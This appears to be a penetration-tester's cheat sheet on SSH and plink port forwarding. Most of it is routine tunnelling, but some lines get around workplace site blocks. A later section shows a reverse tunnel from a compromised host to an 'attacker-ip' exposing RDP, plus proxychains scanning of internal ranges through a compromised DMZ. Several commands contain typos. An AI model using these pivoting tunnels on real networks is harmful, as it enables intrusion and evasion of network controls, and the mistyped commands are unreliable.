Port Forwarding

Local:   ssh <gateway> -L <local port to listen>:<remote host>:<remote port>
Remote:  ssh <gateway> -R <remote port to bind>:<local host>:<local port>
Dynamic: ssh <gateway> -D <port to bind>

Local:   plink.exe <gateway> -L <local port to listen>:<remote host>:<remote port>
Remote:  plink.exe <gateway> -R <remote port to bind>:<local host>:<local port>
Dynamic: plink.exe <gateway> -D <port to bind>

Local Port Forwarding

ssh -L <local-port-to-listen>:<remote-host>:<remote-port> <gateway>

Allow connections to a specific blocked server.

From work:

ssh -L 9001:banned-site.com:80 user@home
curl http://localhost:9001

Says we’re forwarding our local port 9001 to banned-site.com:80, through the gateway home (port 22).

ssh -L 9001:banned:22 user@home
ssh -p 9001 localhost

Allow remote connections to local port forwards (listening on all interfaces)

ssh -L 9001:banned:22 user@home -g
ssh -p 9001 work_machine    #Remotely

Access a port on your server which can only be accessed from localhost and not remotely.

From local machine:

ssh -L 9000:localhost:5432 user@server
psql -h localhost -p 9000

Server acts as the gateway and binds server's port 5432 to local port 9000.

Remote Port Forwarding

Allow remote access to restricted network.

From work:

ssh -R 9001:intra-ssh-server:22 user@home

Server will bind port 9001 on home machine to listen for incoming requests which would subsequently be routed through the created SSH channel. Connecting to localhost:9001 in home will forward user to intra:22

From home:

ssh -p 9001 localhost

Add GatewayPorts yes to sshd_config to listening on all interfaces.

Allow public access to a local resource through a public server.

ssh -R 9000:localhost:3000 user@public_sever
sudo vim /etc/ssh/sshd_config
GatewayPorts yes
sudo service ssh restart

Dynamic port forwarding

One local port for tunneling data to all remote destinations (SOCKS protocol)

From work:

ssh -D 9001 home


Monitoring Tunnels

netstat -tunelp

Avoid TTL



When outbound only 80 / 443 use port forwarding

nano /etc/rinetd.conf
ip1 80 ip2 3389
bindaddress bindport connectaddress connectport

(ip1:80 will proxy for ip2:3389)

Creating reverse SSH client to tunnel-out remote desktop port

Creating Tunnel

FROM remote non routable machine

pling -l root -pw password attacker-ip -R 3390:  

localhost 3389 to attacker ip 3389

FROM attacker's machine

rdesktop localhost:3390

SSH Dynamic Port Forwarding (compromised DMZ used to scan internal IPs)

Create local SOCS4 proxy:

From attacker's machine (compromised DMZ)

ssh -D 8080 root@DMZ-IP

netstat -antp | grep 8080

socks4 8080
proxychains nmap -p 3389 -ST -Pn non-routable-remote-ip-range --oepn

proxychains rdesktop rdp-ip-in-non-routable-range


  • XFLTReaT tunnelling framework: https://github.com/earthquake/XFLTReaT
SOCKS v4, 4a, 5
SCTP (by Darren Martyn @info_dox)
DNS (A/CNAME, PRIVATE, NULL) - Proof of Concept
RDP (Windows only)
  • https://github.com/sshuttle/sshuttle
  • https://github.com/klsecservices/rpivot
  • https://github.com/wolfSSL/wolfssh


Summarized References:

  • https://unix.stackexchange.com/questions/115897/whats-ssh-port-forwarding-and-whats-the-difference-between-ssh-local-and-remot
  • https://chamibuddhika.wordpress.com/2012/03/21/ssh-tunnelling-explained/
  • http://www.debianadmin.com/howto-use-ssh-local-and-remote-port-forwarding.html
  • https://blog.trackets.com/2014/05/17/ssh-tunnel-local-and-remote-port-forwarding-explained-with-examples.html

New References:

  • https://vimeo.com/54505525